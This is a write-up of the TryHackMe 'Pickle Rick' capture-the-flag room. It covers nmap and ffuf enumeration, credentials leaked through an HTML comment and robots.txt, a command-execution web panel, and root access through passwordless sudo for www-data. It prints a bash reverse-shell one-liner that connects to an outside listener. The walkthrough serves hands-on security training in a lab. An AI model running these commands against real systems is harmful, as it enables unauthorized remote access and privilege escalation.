Write-up: Pickle Rick @ TryHackMe

This write-up for the room Pickle Rick is part of my walk-through series for TryHackMe.

TryHackMe | Pickle Rick

Room type: Free
Difficulty: Easy

Lab description

Basic enumeration

I start the lab with a nmap scan to find open ports on the machine.

nmap -nv -Pn -sC -sV -O -T4 -oA nmap 10.10.13.30

The options I use are the following:

• -n
  No DNS resolution
  It makes no sense in the lab and slows down
• -v
  Verbose
  Print open ports as soon as they are found
• -Pn
  No ping scan
  In the lab, I assume the target is online
• -sC
  Use default set of scripts
  Note: This includes some intrusive scans, on a CTF box this is fine, in a real-world scenario using --script=safe is preferred
• -sV
  Version detection
  Attempt to enumerate the versions for services found
• -O
  OS detection
  -T4
  Use aggressive timing
  Another option that is fine in CTF environments but can cause issues in the real world
• -oA
  Output all formats
  I’d like to have all formats stored: nmap, xml and grepable

Without any argument specifying the ports, nmap scans the 1000 most common ports. If you want to find out more, look at the file /usr/share/nmap/nmap-services.

The results come back showing just two ports open:

Nmap results for the top 1000 TCP ports

• A SSH on port 22. Often not worth looking too deep inside as long as there are other avenues.
• A webserver on port 80. Webservers and the application they might run usually go straight to the top of the priority list.

While the OS detection came back inconclusive, both SSH- and web server hint towards Ubuntu, likely Xenial (16.04) based on the 4ubuntu2.6 package version.

Checking the web application

The first step is to check what web application runs on the server, so I open a browser and have a look:

Main web page

It appears to be a fairly static page without any further link or functionality.

However, looking at the HTML reveals a piece of interesting information: a username

Username disclosed in an HTML comment

Finding more web content

To check whether there are any other common files, I perform a quick fuzz with ffuf:

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://10.10.13.30/FUZZ

A quick check with ffuf shows two interesting files

This scan shows the existence of two interesting files:

• a robots.txt
• a login.php

The check for robots.txt should be one of the first steps anyway, as it might contain useful information. In this case, though, it is a non-standard file that just contains an interesting word that does not exist in any language I know:

Content of the robots.txt file

It could be the password for the username, so I quickly attempt to log in with ssh. Unfortunately, the ssh server does not offer password authentication.

So I move to the second page found, the login.php, and do the same thing there:

Login successful

Checking the web application

The login is successful and I start looking through the application. All links in the top menu link to a denied page, but the commands page looks interesting.

The command that I can execute there might be some application-specific one, or it might be a shell command. I give it a quick try by typing id and having it executed:

A web shell provided by the application owner

Checking the file system

As it turns out, it is a web shell that is provided by the application owner for my convenience.

I now check my environment in which I can execute commands:

Content of directory

Trying to use cut or head to read files is prohibited but egrep is not, so I use it to grep for any character:

The first flag

An alternative would be to simply use the browser itself to open the file. There is also a clue for the second flag:

So I do as I’m asked. In the home directory of rick I find the second ingredient that was asked for:

The second flag

Getting a proper shell

Using the web shell is tedious, and even though it is not required to solve this room, I want to obtain proper shell access. On my local machine, I start a ncat listener with ncat -nvlp 8888 and execute a reverse shell on the command panel:

bash -c "bash -i >& /dev/tcp/10.14.5.57/8888 0>&1"

Unfortunately, a python upgrade to a proper tty shell is not successful as python is not installed. But this reverse shell is still much more convenient than the web shell.

Local enumeration

For local enumeration, I use the tool linpeas. I download it to my target and execute it.

A few seconds later, a nice finding is displayed:

Vulnerable configuration found with linpeas

The same information can be obtained manually with sudo -l:

The same found manually

The low privilege account www-data is allowed to run any command as root without having to provide any password.

This is a serious misconfiguration and a direct path to eternal damnation.

Escalating my privileges

The only thing that is left is to execute a few commands as root:

The last flag

I enter the final flag and the room is completed.

Originally published at https://github.com.

From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 Github Repos and tools, and 1 job alert for FREE!